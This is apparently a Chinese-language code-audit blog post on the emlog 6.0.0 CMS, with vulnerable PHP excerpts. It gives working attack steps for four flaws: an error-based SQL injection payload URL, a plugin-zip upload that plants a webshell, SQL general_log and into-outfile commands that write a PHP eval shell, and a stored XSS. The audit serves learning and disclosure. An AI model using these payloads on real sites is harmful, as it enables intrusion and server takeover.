1、前言
本小菜亦是刚起始玩代码审计,近期发掘个比较有趣的CMS跟大众分享一波,虽然只找到有些鸡肋漏洞。废话不多说起始进入正题,这次审计的CMS是emlog 6.0.0版本,官方位置为:http://www.emlog.net。
2、审计思路
在学习先辈们的文案后,自己稍微总结一下代码审计的思路重点能够分为以下四种。
1) 查询可控变量,正向跟踪变量传递过程,查看变量是不是进行进行过滤,是不是进行后台交互。
2) 查询敏锐函数,如Select、Insert等,回溯该函数的参数是不是进行过滤、是不是可控。
3) 寻敏锐功能点,通读功能点模块,如上传点。
4) 直接通读全文代码,这种方式能够更好的理解代码的业务规律,能够挖掘出更有价值的漏洞
3、审计过程
1. Sql注入
废话不多说,像本小菜这种级别的还是比较爱好第1种思路,简单粗暴。
首要认识一下代码大概规律结构,而后用notepad大法搜索一下$_GET参数瞧瞧那些输入没进行过滤,咱们再进行切入。经过搜索发掘/admin/comment.php中未对$_GET[‘ip’]进行任何限制,接下来就查看IP这个参数是不是进行了敏锐操作。
当action等于delbyip时,对token进行判定,查看是不是是管理员,而后将$_GET[‘ip’]赋值给$ip,而后再调用dleCommentByIp($ip)函数,代码如下: if ($action== delbyip) {
LoginAuth::checkToken();if (ROLE != ROLE_ADMIN) {
emMsg(权限不足!, ./);
}
$ip = isset($_GET[ip]) ? $_GET[ip] : ;
$Comment_Model->delCommentByIp($ip);
$CACHE->updateCache(array(sta,comment));
emDirect("./comment.php?active_del=1");
}接下来进行跟进class Comment_Model的delCommentByIp函数,继续运用搜索大法,在/inludes/model/comment_model.php中发掘delCommentByIp函数,跟进delCommentByIp函数,能够看出这个函数直接将传入的参数$ip,代入“SELECT DISTINCT gid FROM “.DB_PREFIX.”comment WHERE ip=’$ip’”进行sql查找,此过程中未发掘任何过滤行径,咱们只需经过封闭单引号而后进行报错注入。 function delCommentByIp($ip) {
$blogids = array();
$sql ="SELECT DISTINCT gid FROM ".DB_PREFIX."comment WHERE ip=$ip";
$query = $this->db->query($sql); while($row = $this->db->fetch_array($query)) {
$blogids[] = $row[gid];
}
$this->db->query("DELETE FROM ".DB_PREFIX."comment WHERE ip=$ip"
);
$this->updateCommentNum($blogids);
}
接下来就进行漏洞验证了,拜访http://127.0.0.1/emlog/admin/comment.php,点击按照ip删除,用burpsuite抓取数据包,构造payload
/emlog/admin/comment.php?action=delbyip&token=abac6e12c2abe9b29797b64481ef6ed4&ip=127.0.0.1′and (extractvalue(1,concat(0x7e,(select user()),0x7e)))# 注入时得进行编码处理才可成功,当然各位师傅的骚操作比我多。
 比较尴尬的是该注入点进行了权限校验,亦便是说仅有管理员才可注入,因此该漏洞非常的鸡肋,当然亦只是分享一下自己的学习审计过程。
2. 文件上传漏洞
在admin/plugin.php插件上传处存在上传漏洞,经过上传zip压缩的文件,就可上传木马文件。在plugin.php约79行处的上传点当action为upload_zip进行判断,先判断是不是上传文件是不是为空.. if ($action == upload_zip) {
LoginAuth::checkToken();
$zipfile = isset($_FILES[pluzip]) ? $_FILES[pluzip] : ; if ($zipfile[error] == 4) {
emDirect("./plugin.php?error_d=1");
} if (!$zipfile || $zipfile[error] >= 1 || empty($zipfile[tmp_name])) {
emMsg(插件上传失败);
} if (getFileSuffix($zipfile[name]) != zip) { //判断后缀名是不是为zip
emDirect("./plugin.php?error_f=1");
}
$ret = emUnZip($zipfile[tmp_name], ../content/plugins/, plugin);//解压zip文件到../content/plugins/目录下
switch ($ret) { case 0:
emDirect("./plugin.php?activate_install=1#tpllib"); break; case -1:
emDirect("./plugin.php?error_e=1"); break; case 1: case 2:
emDirect("./plugin.php?error_b=1"); break; case 3:
emDirect("./plugin.php?error_c=1"); break;
}
}而后经过include\lib\function.base.php中的getFilesuSuffix函数获取后缀名,并判断是不是为zip。 function getFileSuffix($fileName) { return
strtolower(pathinfo($fileName,  ATHINFO_EXTENSION));
}
之后经过include\lib\function.base.php中emUnzip函数进行解压zip文件,在解压的过程中会对压缩包里的文件名叫作进行判断,倘若你压缩包名叫作为test则压缩包里必须存在test.php文件,否者会进行报错。
function emUnZip($zipfile, $path, $type = tpl) { if(!class_exists(ZipArchive, FALSE)) { return 3;//zip模块问题
}
$zip = new ZipArchive(); if (@$zip->open($zipfile) !== TRUE) { return 2;//文件权限问题
}
$r = explode(/, $zip->getNameIndex(0), 2);
$dir = isset($r[0]) ? $r[0] . / : ; switch ($type) { case tpl:
$re = $zip->getFromName($dir . header.php); if (false === $re) return -2; break; case plugin:
$plugin_name = substr($dir, 0, -1);
$re = $zip->getFromName($dir . $plugin_name . .php);//判断是不是存在与文件夹名叫作相同的php文件
if (false === $re) return -1; break; case backup:
$sql_name = substr($dir, 0, -1); if (getFileSuffix($sql_name) != sql) return -3; break; case update: break;
} if (true === @$zip->extractTo($path)) {
$zip->close(); return 0;
} else { return 1;//文件权限问题
}
}
漏洞验证:
将一句话木马以zip格式进行压缩
 而后在插件上传处上传插件
上传成功后运用菜刀连接content/plugins/test1/test1.php,获取webshell。
3. 数据库备份拿shell
数据库拿shell重点有两种方式:
1、select …into outfile 利用需要的要求有:对web目录需要有写权限;能够运用单引号;晓得绝对路径;无配置-secure-file-priv
2、经过general_log,将日志写入特定目录下,利用要求又:对web目录需要要写权限;能够运用单引号;晓得绝对路径;能够执行多行sql语句。
先尝试第1种办法,先备份sql语句,在其基本上插进select “<?php @eval($_POST[cmd]) ?>” into outfile ‘eval.php’语句就ok了,然则因为配置了secure-file-priv,因此GG,这个办法行不通。
 
运用第二种办法,设置了 general_log 和 general_log_file之后所有SQL记录都会写入指定的文件,因此能够经过这种办法将php语句写到log中。查找语句如下
set global general_log=on;
SET global general_log_file=C:/phpStudy/PHPTutorial/WWW/emlog/eval.php;
SELECT <?php phpinfo();?>;
接下来操作如上导入备份文件就可,在C:/phpStudy/PHPTutorial/WWW/emlog/目录下生成eval.php的log文件。
拜访http://127.0.0.1/emlog/eval.php,查看获取shell。
4. 存储型xss
后台链接添加处admin/link.php 【http://localhost/admin/link.php】,siteurl参数输出时未进行实体化处理引起,存储型xss。在$action=addlink时,经过addslashes函数进行转义处理,防止进行sql注入,然则未进行任何的html实体化,或过滤处理。经过第44行代码可发掘进行了正则匹配因此咱们构造的payload需以http、ftp开头,才可进型数据插进。 if ($action== addlink) {
$taxis = isset($_POST[taxis]) ? intval(trim($_POST[taxis])) : 0;
$sitename =isset($_POST[sitename]) ? addslashes(trim($_POST[sitename])) : ;
$siteurl = isset($_POST[siteurl]) ? addslashes(trim($_POST[siteurl])) : ;
$description =isset($_POST[description]) ? addslashes(trim($_POST[description])) : ; if ($sitename == || $siteurl ==) {
emDirect("./link.php?error_a=1");
} if (!preg_match("/^http|ftp.+$/i", $siteurl)) { //需以http、ftp开头,
$siteurl = http://.$siteurl;
}
$Link_Model->addLink($sitename, $siteurl, $description, $taxis);
$CACHE->updateCache(link);
emDirect("./link.php?active_add=1");
}经过addLink函数插进链接,接下来跟进/include/model/link_model.php中的link_Model->addLink函数,该函数将经过addslashes转义完的链接插进数据库 进行存储。 function addLink($name, $url, $des, $taxis) { if ($taxis > 30000 || $taxis < 0) { $taxis = 0;
} $sql="insert into ".DB_PREFIX."link (sitename,siteurl,description,taxis) values($name,$url,$des, $taxis)"; $this->db->query($sql);
}接下来跟进输出状况,当action参数为空,经过/include/model/link_model.php中的Link_Model->getLinks()函数从数据库查找sitename、description、siteurl,并返回查找结果,最后由View: utput()进行输出。getLinks()函数查找数据库获取,获取sitename、description、siteurl数据,查看可发掘未对siteurl参数进行实体化和过滤处理。
查看/include/lib/view.php 中的View:utput函数,最后结果经过echo输出,在全部过程都未对siteurl进行实体化、过滤处理,引起最后导致存储型xss。
漏洞验证
4、结束语
这个cms漏洞当然不止这些,还有非常多问题。其实全部过程中审计的漏洞利用价值都不大,堪叫作鸡肋,本文只是分享自己学习的过程,由简单到繁杂,分享一下自己的学习体会罢了,望各位师傅多多包涵。
*本文作者:fishyyh,转载请注明来自FreeBuf.COM。
 fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E)
| 
发表于